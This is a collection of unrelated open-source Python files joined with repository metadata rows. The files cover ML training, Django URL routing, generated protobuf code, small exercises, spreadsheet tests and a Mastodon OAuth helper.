ff_for_transformer = FeatureFactoryForTransformer(column_config=column_config,
dict_path="../feature_engineering/",
sequence_length=params["max_seq"],
logger=logger)
if not load_pickle or is_debug:
group = ff_for_transformer.all_predict(df[df["content_type_id"] == 0])
dataset_val = SAKTDataset(group,
is_test=True,
n_skill=n_skill,
max_seq=params["max_seq"])
os.makedirs("../input/feature_engineering/model225", exist_ok=True)
if not is_debug and not load_pickle:
with open(f"../input/feature_engineering/model225/train.pickle", "wb") as f:
pickle.dump(dataset_train, f)
with open(f"../input/feature_engineering/model225/val.pickle", "wb") as f:
pickle.dump(dataset_val, f)
if not is_debug and load_pickle:
with open(f"../input/feature_engineering/model225/train.pickle", "rb") as f:
dataset_train = pickle.load(f)
with open(f"../input/feature_engineering/model225/val.pickle", "rb") as f:
dataset_val = pickle.load(f)
print("loaded!")
dataloader_train = DataLoader(dataset_train, batch_size=params["batch_size"], shuffle=True)
dataloader_val = DataLoader(dataset_val, batch_size=params["batch_size"], shuffle=False)
model = SAKTModel(n_skill, embed_dim=params["embed_dim"], max_seq=params["max_seq"], dropout=dropout,
cont_emb=params["cont_emb"])
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters,
lr=params["lr"],
weight_decay=0.01,
)
num_train_optimization_steps = int(len(dataloader_train) * 20)
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=params["num_warmup_steps"],
num_training_steps=num_train_optimization_steps)
criterion = nn.BCEWithLogitsLoss()
model.to(device)
criterion.to(device)
for epoch in range(epochs):
loss, acc, auc, auc_val = train_epoch(model, dataloader_train, dataloader_val, optimizer, criterion, scheduler,
epoch, device)
print("epoch - {} train_loss - {:.3f} auc - {:.4f} auc-val: {:.4f}".format(epoch, loss, auc, auc_val))
torch.save(model.state_dict(), f"{output_dir}/transformers_epoch{epoch}_auc{round(auc, 4)}.pth")
preds = []
labels = []
with torch.no_grad():
for item in tqdm(dataloader_val):
label = item["label"].to(device).float()
output = model(item, device)
preds.extend(torch.nn.Sigmoid()(output[:, -1]).view(-1).data.cpu().numpy().tolist())
labels.extend(label[:, -1].view(-1).data.cpu().numpy().tolist())
auc_transformer = roc_auc_score(labels, preds)
print("single transformer: {:.4f}".format(auc_transformer))
df_oof = pd.DataFrame()
# df_oof["row_id"] = df.loc[val_idx].index
print(len(dataloader_val))
print(len(preds))
df_oof["predict"] = preds
df_oof["target"] = labels
df_oof.to_csv(f"{output_dir}/transformers1.csv", index=False)
"""
df_oof2 = pd.read_csv("../output/ex_237/20201213110353/oof_train_0_lgbm.csv")
df_oof2.columns = ["row_id", "predict_lgbm", "target"]
df_oof2 = pd.merge(df_oof, df_oof2, how="inner")
auc_lgbm = roc_auc_score(df_oof2["target"].values, df_oof2["predict_lgbm"].values)
print("lgbm: {:.4f}".format(auc_lgbm))
print("ensemble")
max_auc = 0
max_nn_ratio = 0
for r in np.arange(0, 1.05, 0.05):
auc = roc_auc_score(df_oof2["target"].values, df_oof2["predict_lgbm"].values*(1-r) + df_oof2["predict"].values*r)
print("[nn_ratio: {:.2f}] AUC: {:.4f}".format(r, auc))
if max_auc < auc:
max_auc = auc
max_nn_ratio = r
print(len(df_oof2))
"""
if not is_debug:
mlflow.start_run(experiment_id=10,
run_name=os.path.basename(__file__))
for key, value in params.items():
mlflow.log_param(key, value)
mlflow.log_metric("auc_val", auc_transformer)
mlflow.end_run()
torch.save(model.state_dict(), f"{output_dir}/transformers.pth")
del model
torch.cuda.empty_cache()
with open(f"{output_dir}/transformer_param.json", "w") as f:
json.dump(params, f)
if is_make_feature_factory:
# feature factory
feature_factory_dict = {"user_id": {}}
feature_factory_dict["user_id"]["DurationPreviousContent"] = DurationPreviousContent(is_partial_fit=True)
feature_factory_dict["user_id"]["ElapsedTimeBinningEncoder"] = ElapsedTimeBinningEncoder()
feature_factory_manager = FeatureFactoryManager(feature_factory_dict=feature_factory_dict,
logger=logger,
split_num=1,
model_id="all",
load_feature=not is_debug,
save_feature=not is_debug)
ff_for_transformer = FeatureFactoryForTransformer(column_config=column_config,
dict_path="../feature_engineering/",
sequence_length=params["max_seq"],
logger=logger)
df = pd.read_pickle("../input/riiid-test-answer-prediction/train_merged.pickle")
if is_debug:
df = df.head(10000)
df = df.sort_values(["user_id", "timestamp"]).reset_index(drop=True)
feature_factory_manager.fit(df)
df = feature_factory_manager.all_predict(df)
for dicts in feature_factory_manager.feature_factory_dict.values():
for factory in dicts.values():
factory.logger = None
feature_factory_manager.logger = None
with open(f"{output_dir}/feature_factory_manager.pickle", "wb") as f:
pickle.dump(feature_factory_manager, f)
ff_for_transformer.fit(df)
ff_for_transformer.logger = None
with open(f"{output_dir}/feature_factory_manager_for_transformer.pickle", "wb") as f:
pickle.dump(ff_for_transformer, f)
if __name__ == "__main__":
if not is_debug:
for _ in tqdm(range(wait_time)):
time.sleep(1)
output_dir = f"../output/{os.path.basename(__file__).replace('.py', '')}/{dt.now().strftime('%Y%m%d%H%M%S')}/"
os.makedirs(output_dir, exist_ok=True)
for cont_emb in [8]:
for cat_emb in [256]:
dropout = 0.2
lr = 0.8e-3
if is_debug:
batch_size = 8
else:
batch_size = 128
params = {"embed_dim": cat_emb,
"cont_emb": cont_emb,
"max_seq": 100,
"batch_size": batch_size,
"num_warmup_steps": 12000,
"lr": lr,
"dropout": dropout}
main(params, output_dir=output_dir) | [
"[email protected]"
] | |
17c14221dd22255ed751dc3f60dafc64a8e62399 | 01857ef455ea60eccaf03b5a9059ec83e9803c2e | /nicegui/tailwind_types/text_align.py | 476e196f84b46e2c187f30f1984c510e8a9430c5 | [
"MIT"
] | permissive | zauberzeug/nicegui | f08312cc1f393deca79e0e84a2506d3a35efff16 | c61b1315f29d51e26cc1168207f5616b302f8df0 | refs/heads/main | 2023-08-18T18:09:30.937322 | 2023-08-18T15:04:00 | 2023-08-18T15:04:00 | 365,250,183 | 5,128 | 271 | MIT | 2023-09-14T01:50:56 | 2021-05-07T13:55:05 | Python | UTF-8 | Python | false | false | 129 | py | from typing import Literal
TextAlign = Literal[
'left',
'center',
'right',
'justify',
'start',
'end',
]
| [
"[email protected]"
] | |
462611dfa57951daafc012909847ccf8fa2f644e | 60c84d8dc4b30731193745bf0580584087efe337 | /examples/hello/hello.py | 53bd3f56564ec3d0888b59c23c85a01ffe0e0ee1 | [] | no_license | danse-inelastic/pyregui | f321917f6c0c955356d8b87f6466c3acddd5b194 | 3d7f90352361cbdbaa553002be6e810e84b3f44d | refs/heads/master | 2020-04-05T18:57:14.422685 | 2013-06-14T00:30:44 | 2013-06-14T00:30:44 | 34,145,791 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,078 | py | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from pyre.components.Component import Component
class hello(Component):
'A greeter that says "hello"'
class Inventory(Component.Inventory):
import pyre.inventory
greeting = pyre.inventory.str( 'greeting', default = 'hello' )
pass
def greet(self, name):
greeting = self.greeting
print "%s %s" % (greeting, name)
return
def __init__(self, name, facility = "greeter"):
Component.__init__(self, name, facility=facility)
return
def _defaults(self):
Component._defaults(self)
return
def _configure(self):
Component._configure(self)
self.greeting = self.inventory.greeting
return
def _init(self):
Component._init(self)
return
def greeter(): return hello( 'hello' )
# version
__id__ = "$Id$"
# End of file
| [
"[email protected]"
] | |
95f1540887394030c26f2f55d4910567d0642e49 | 6dfa271fb41c9d4a1a74ce34c4bee252a2d86291 | /sympy/thirdparty/pyglet/pyglet/window/xlib/cursorfont.py | 16c5e740ecd81ff97be40c31104783842b690ad0 | [
"BSD-3-Clause"
] | permissive | gnulinooks/sympy | 7e4776cd1ea24bde56dbc17207611a9bc7523e50 | 46f63841f96cd025289b91ba9db3e261138d720a | refs/heads/master | 2016-09-10T18:56:49.556138 | 2009-04-05T14:10:49 | 2009-04-05T14:10:49 | 169,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,295 | py | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2007 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: cursorfont.py 1322 2007-10-23 12:58:03Z Alex.Holkner $'
# /usr/include/X11/cursorfont.h
XC_num_glyphs = 154
XC_X_cursor = 0
XC_arrow = 2
XC_based_arrow_down = 4
XC_based_arrow_up = 6
XC_boat = 8
XC_bogosity = 10
XC_bottom_left_corner = 12
XC_bottom_right_corner = 14
XC_bottom_side = 16
XC_bottom_tee = 18
XC_box_spiral = 20
XC_center_ptr = 22
XC_circle = 24
XC_clock = 26
XC_coffee_mug = 28
XC_cross = 30
XC_cross_reverse = 32
XC_crosshair = 34
XC_diamond_cross = 36
XC_dot = 38
XC_dotbox = 40
XC_double_arrow = 42
XC_draft_large = 44
XC_draft_small = 46
XC_draped_box = 48
XC_exchange = 50
XC_fleur = 52
XC_gobbler = 54
XC_gumby = 56
XC_hand1 = 58
XC_hand2 = 60
XC_heart = 62
XC_icon = 64
XC_iron_cross = 66
XC_left_ptr = 68
XC_left_side = 70
XC_left_tee = 72
XC_leftbutton = 74
XC_ll_angle = 76
XC_lr_angle = 78
XC_man = 80
XC_middlebutton = 82
XC_mouse = 84
XC_pencil = 86
XC_pirate = 88
XC_plus = 90
XC_question_arrow = 92
XC_right_ptr = 94
XC_right_side = 96
XC_right_tee = 98
XC_rightbutton = 100
XC_rtl_logo = 102
XC_sailboat = 104
XC_sb_down_arrow = 106
XC_sb_h_double_arrow = 108
XC_sb_left_arrow = 110
XC_sb_right_arrow = 112
XC_sb_up_arrow = 114
XC_sb_v_double_arrow = 116
XC_shuttle = 118
XC_sizing = 120
XC_spider = 122
XC_spraycan = 124
XC_star = 126
XC_target = 128
XC_tcross = 130
XC_top_left_arrow = 132
XC_top_left_corner = 134
XC_top_right_corner = 136
XC_top_side = 138
XC_top_tee = 140
XC_trek = 142
XC_ul_angle = 144
XC_umbrella = 146
XC_ur_angle = 148
XC_watch = 150
XC_xterm = 152
| [
"[email protected]"
] | |
733f9358c73617a8542ae58b5af6e60c4fd3b6da | 831fc9a25077345226874a103a46724a3906ddbe | /b_list/urls.py | 5b00c938cb3bbe4efe019852ead1926ef5a8a777 | [
"BSD-3-Clause"
] | permissive | softwareprojectPHD/b_list | a2f6c0890b0dbd348c77d62cdac81db69ea2e2c3 | 7efc5d15750b0fd366a40eef4794a0356f309327 | refs/heads/master | 2020-12-25T09:27:44.477238 | 2016-04-16T03:54:13 | 2016-04-17T03:58:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | """
Root URLconf.
"""
from django.conf.urls import include
from django.conf.urls import url
from django.contrib import admin
from blog.views import EntryArchiveIndex
from flashpolicies.views import no_access
# Redirect views which prevent an older URL scheme from 404'ing.
from . import views
urls = [
url(r'^admin/', include(admin.site.urls)),
url(r'^$',
EntryArchiveIndex.as_view(
template_name='home.html',
),
name='home'),
url(r'^contact/', include('contact_form.urls')),
url(r'^feeds/', include('blog.urls.feeds')),
url(r'^projects/', include('projects.urls')),
url(r'^weblog/categories/', include('blog.urls.categories')),
url(r'^weblog/', include('blog.urls.entries')),
url(r'^crossdomain.xml$', no_access),
]
legacy = [
url(r'^links/', views.gone),
url(r'^weblog/(?P<year>\d{4})/(?P<month>\d{2})/$',
views.EntryMonthRedirect.as_view()),
url(r'^weblog/(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/$',
views.EntryDayRedirect.as_view()),
url(r'^weblog/(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[-\w]+)/$',
views.EntryDetailRedirect.as_view()),
url(r'^media/(?P<path>.*)$', views.MediaRedirect.as_view()),
]
# The redirecting patterns come first; otherwise, the main URLs would
# catch those and 404.
urlpatterns = legacy + urls
| [
"[email protected]"
] | |
9c079ffee4a8446340856d6c9a3f18c21f3f77a0 | a81c1492783e7cafcaf7da5f0402d2d283b7ce37 | /google/ads/google_ads/v6/proto/errors/account_link_error_pb2.py | bcb4b476f4b191721a76ed542da5e88fb13651ea | [
"Apache-2.0"
] | permissive | VincentFritzsche/google-ads-python | 6650cf426b34392d1f58fb912cb3fc25b848e766 | 969eff5b6c3cec59d21191fa178cffb6270074c3 | refs/heads/master | 2023-03-19T17:23:26.959021 | 2021-03-18T18:18:38 | 2021-03-18T18:18:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 3,974 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v6/errors/account_link_error.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads/v6/errors/account_link_error.proto',
package='google.ads.googleads.v6.errors',
syntax='proto3',
serialized_options=b'\n\"com.google.ads.googleads.v6.errorsB\025AccountLinkErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v6/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V6.Errors\312\002\036Google\\Ads\\GoogleAds\\V6\\Errors\352\002\"Google::Ads::GoogleAds::V6::Errors',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n7google/ads/googleads/v6/errors/account_link_error.proto\x12\x1egoogle.ads.googleads.v6.errors\x1a\x1cgoogle/api/annotations.proto\"\\\n\x14\x41\x63\x63ountLinkErrorEnum\"D\n\x10\x41\x63\x63ountLinkError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x12\n\x0eINVALID_STATUS\x10\x02\x42\xf0\x01\n\"com.google.ads.googleads.v6.errorsB\x15\x41\x63\x63ountLinkErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v6/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V6.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V6\\Errors\xea\x02\"Google::Ads::GoogleAds::V6::Errorsb\x06proto3'
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR = _descriptor.EnumDescriptor(
name='AccountLinkError',
full_name='google.ads.googleads.v6.errors.AccountLinkErrorEnum.AccountLinkError',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='INVALID_STATUS', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=145,
serialized_end=213,
)
_sym_db.RegisterEnumDescriptor(_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR)
_ACCOUNTLINKERRORENUM = _descriptor.Descriptor(
name='AccountLinkErrorEnum',
full_name='google.ads.googleads.v6.errors.AccountLinkErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=121,
serialized_end=213,
)
_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR.containing_type = _ACCOUNTLINKERRORENUM
DESCRIPTOR.message_types_by_name['AccountLinkErrorEnum'] = _ACCOUNTLINKERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AccountLinkErrorEnum = _reflection.GeneratedProtocolMessageType('AccountLinkErrorEnum', (_message.Message,), {
'DESCRIPTOR' : _ACCOUNTLINKERRORENUM,
'__module__' : 'google.ads.googleads.v6.errors.account_link_error_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.errors.AccountLinkErrorEnum)
})
_sym_db.RegisterMessage(AccountLinkErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
03b546b952137e54723329d1559c8288fabd29d9 | 765189a475513378ae80c97faf38b99e3ce1dc28 | /algorithms/401-500/476.number-complement.py | 2a0252d82de04ee699e259e24f88bb2856487172 | [] | no_license | huilizhou/kemu_shuati | c8afc979f57634e066f6ce98da879cf1ed4e6b95 | 55b52cfff699aa71d92dd09d150ce71628b21890 | refs/heads/master | 2020-04-29T01:13:53.784665 | 2019-03-15T01:16:06 | 2019-03-15T01:16:06 | 175,723,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | class Solution(object):
def findComplement(self, num):
"""
:type num: int
:rtype: int
"""
# 人家的解法
# return 2 ** (len(bin(num)) - 2) - 1 - num
# # 我的解法
# z = bin(num)[2:]
# z1 = ''
# for i in z:
# if i == '1':
# z1 += '0'
# else:
# z1 += '1'
# res = int(z1, 2)
# return res
# 人家的解法
# n = 2
# while n < num:
# n <<= 1
# return n - 1 - num
i = 1
while num >= i:
num ^= i
i <<= 1
return num
print(Solution().findComplement(5))
| [
"[email protected]"
] | |
e2daf2c10b89897b95813eb9b9aa8cb2a7c61e8b | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_textbox04.py | 486daa245958fcdc1dee5ed14a655faaee774af2 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,369 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('textbox04.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with textbox(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [61365632, 64275584]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
worksheet.insert_chart('E9', chart)
worksheet.insert_textbox('F25', 'This is some text')
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
9c9914865de3c1df41c80e63a0c11656069a6471 | 0455bd20bfc0fdd9b8553d033891e5b31e2e9384 | /CrunchbaseInitial/CrunchbaseDataExtraction/AsianGendersNonEntrepreneurs.py | e278a5d1b35335d8f68f2f83f007fc2ada86f1e0 | [] | no_license | kyriacosar/LInC-Eclipse-Repository | a0419305b824d8adcab0d31ab71ce9e4e2307f22 | c480e071f9e571224e55983c3e9c6d0f70d0e511 | refs/heads/master | 2020-12-02T21:25:36.537787 | 2017-07-27T09:25:00 | 2017-07-27T09:25:00 | 96,314,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,868 | py | '''
Created on Jul 11, 2017
@author: kyriacos
'''
import json
import math
if __name__ == '__main__':
e_file_in = open("../../../../Documents/Crunchbase Project Data/Microsoft/Crunchbase Results/Data Dictionaries/Crunchbase_Non_Entrepreneurs_FaceAttributes_Dictionaries.json", "r")
e_file_out = open("../../../../Documents/Crunchbase Project Data/Microsoft/Crunchbase Results/Data Extraction/Crunchbase_Asian_Non_Entrepreneurs_Gender_Percentages.txt", "w")
male = 0
maleAge = 0
female = 0
femaleAge = 0
count=0
for record in e_file_in:
try:
jDict = json.loads(record)
str_gender = str(jDict['faceAttributes']['gender'])
try:
str_ethn = str(jDict['faceAttributes']['ethnicity'])
if str_ethn == 'Asian':
if str_gender == 'male':
male += 1
maleAge += jDict['faceAttributes']['age']
elif str_gender == 'female':
female += 1
femaleAge += jDict['faceAttributes']['age']
count += 1
except KeyError:
print
except ValueError:
print("Error in json to dictionary translation.")
e_file_out.write("Gender percentages among Asian Entrepreneurs:\n\n")
e_file_out.write("Males: "+str(male)+" out of "+str(count)+" with percentage "+str(male/float(count)*100.0))
e_file_out.write("\nFemales: "+str(female)+" out of "+str(count)+" with percentage "+str(female/float(count)*100.0))
e_file_out.write("\n\nAverage age among non Asian Entrepreneurs:\n\n")
e_file_out.write("Male: "+str(maleAge/male))
e_file_out.write("\nFemale: "+str(femaleAge/female)) | [
"Kyriacos"
] | Kyriacos |
3468a788789a89e21d9f7bca64d58226d88bd41f | f329f3061e3a72b2562bb242dfe1a2ed07fe65f0 | /plugins/yongyou_zhiyuan_a6_app.py | b860deb6797eb3a2707688c9c7b7c34d87871b9e | [
"MIT"
] | permissive | ver007/getcms | 58263174355eb16bae95b74f6efaff5069b4ce56 | da03c07457abc266cacddc3ccd67126f0b03da3d | refs/heads/master | 2021-01-19T07:01:51.453626 | 2016-04-13T08:28:14 | 2016-04-13T08:28:14 | 56,134,430 | 0 | 0 | null | 2016-04-13T08:27:38 | 2016-04-13T08:27:38 | null | UTF-8 | Python | false | false | 164 | py | #!/usr/bin/env python
# encoding: utf-8
def run(whatweb, pluginname):
whatweb.recog_from_file(pluginname, "yyoa/common/js/javaSeesion.js", "f_showallCookie")
| [
"[email protected]"
] | |
088f5a935085713d1f20c82d2f95e0ba31e9fc85 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/difference-of-squares/6bb2f99092244bb48dce2c00c19a804f.py | bad5f033d6a46058afa17473abbfba5fefc147e7 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,191 | py | # -*- coding: utf-8 -*-
from __future__ import division
def difference(n):
"""
differences(int) -> int
Return the difference between the square of the sums and the sums of the
squares up to n.
"""
return square_of_sum(n) - sum_of_squares(n)
def square_of_sum(n):
"""
square_of_sum(int) -> int
Return the square of the sum of all integers from 0 to n >= 0.
"""
#1 + 2 + 3 + 4 + ... + n = n (n+1) //2
#note that the division works because n or n+1 is even
return ((n * (n + 1)) // 2) ** 2
def sum_of_squares(n):
"""
square_of_sum(int) -> int
Return the sum of all integers squared from 0 to n >= 0.
"""
#Let T_n be the sum of the integers up to n
#Let S_n be the sum of the squares up to n
#Let K_n be the sum of the cubes up to n
# K_n = K_(n+1) - (n+1)**3
# = K_n + 3*S_n + 3*T_n + n - (n+1)**3
#
# <=> 3*S_n = (n+1)**3 - n - 3*T_n
# = n**3 + 3*n**2 + 3*n + 1 - 3/2(n**2 - 1)
# = n**3 + 3/2*n**2 + n/2
# <=> S_n = 1/3 * n**3 + 1/2 * n**2 + 1/6 * n
# = ((2 * n + 3) * n + 1) * n * 1/6
return (((2 * n + 3) * n + 1) * n) // 6
| [
"[email protected]"
] | |
87c0bb86ab7e49b7da4231abad6364ea302f122e | b5b1be6063901bd0bc97c3fbc2c26be1d02ce79e | /output/__init__.py | e9b0cb52d8081c4e39506efa55060fb586d86b77 | [] | no_license | dssg/rcra | ff566ff388596a733757e4de27631cbabdc7f15c | fcdd8f95c25902e46c55d85cbc4fe54196163f3d | refs/heads/master | 2021-06-11T13:09:01.686456 | 2017-02-24T05:19:51 | 2017-02-24T05:19:51 | 61,817,642 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from drain.data import FromSQL
facilities = FromSQL("""
select rcra_id, zip_code, dedupe_id as entity_id
from output.facilities
join dedupe.unique_map using (rcra_id)
""", tables=['output.facilities', 'output.handler_names'])
facilities.target=True
| [
"[email protected]"
] | |
d14fb1d43dc3d360f35e8f8cf30463263d7b729e | 6944866ffa5b6899c812cbd06929cd29896f557d | /oauth_dropins/mastodon.py | 567dea787adeec4c951c61cbd9db7e18b92723d2 | [
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"Unlicense"
] | permissive | stedn/oauth-dropins | f7b329c69f79297dfc6f8060c10d2b069c5cb0a8 | afe5cc946e2d969a37d83e2a093195c1d5cf27db | refs/heads/master | 2021-05-23T15:56:22.354077 | 2020-03-27T17:40:51 | 2020-03-27T17:40:51 | 253,368,311 | 2 | 0 | Unlicense | 2020-04-06T01:31:32 | 2020-04-06T01:31:32 | null | UTF-8 | Python | false | false | 12,423 | py | """Mastodon OAuth drop-in.
Mastodon is an ActivityPub implementation, but it also has a REST + OAuth 2 API
independent of AP. Uh, ok, sure.
API docs: https://docs.joinmastodon.org/api/
Interestingly: as usual w/OAuth, they require registering apps beforehand...but
since AP and Mastodon are decentralized, there's no single place to register an
app. So they have an API for registering apps, per instance:
https://docs.joinmastodon.org/api/authentication/
Surprising, and unusual, but makes sense.
"""
import logging
from urllib.parse import quote_plus, unquote, urlencode, urljoin, urlparse, urlunparse
from google.cloud import ndb
import requests
from webob import exc
from . import handlers
from .models import BaseAuth
from .webutil import appengine_info, util
from .webutil.util import json_dumps, json_loads
# https://docs.joinmastodon.org/api/permissions/
ALL_SCOPES = (
'read',
'read:accounts',
'read:blocks',
'read:favourites',
'read:filters',
'read:follows',
'read:lists',
'read:mutes',
'read:notifications',
'read:reports',
'read:search',
'read:statuses',
'write',
'write:accounts',
'write:blocks',
'write:favourites',
'write:filters',
'write:follows',
'write:lists',
'write:media',
'write:mutes',
'write:notifications',
'write:reports',
'write:statuses',
'follow',
'push',
)
INSTANCE_API = '/api/v1/instance'
REGISTER_APP_API = '/api/v1/apps'
VERIFY_API = '/api/v1/accounts/verify_credentials'
# URL templates. Can't (easily) use urlencode() because I want to keep
# the %(...)s placeholders as is and fill them in later in code.
AUTH_CODE_API = '&'.join((
'/oauth/authorize?'
'response_type=code',
'client_id=%(client_id)s',
'client_secret=%(client_secret)s',
# https://docs.microsoft.com/en-us/linkedin/shared/integrations/people/profile-api?context=linkedin/consumer/context#permissions
'scope=%(scope)s',
# must be the same in the access token request
'redirect_uri=%(redirect_uri)s',
'state=%(state)s',
))
ACCESS_TOKEN_API = '/oauth/token'
def _encode_state(app, state):
wrapped = json_dumps({
'app_key': app.key.urlsafe().decode(),
'state': quote_plus(state),
})
logging.debug('Encoding wrapper state: %r', wrapped)
return wrapped
def _decode_state(state):
logging.debug('Decoding wrapper state: %r', state)
decoded = json_loads(state)
return decoded['app_key'], unquote(decoded['state'])
class MastodonApp(ndb.Model):
"""A Mastodon API OAuth2 app registered with a specific instance."""
instance = ndb.StringProperty(required=True) # URL, eg https://mastodon.social/
data = ndb.TextProperty(required=True) # JSON; includes client id/secret
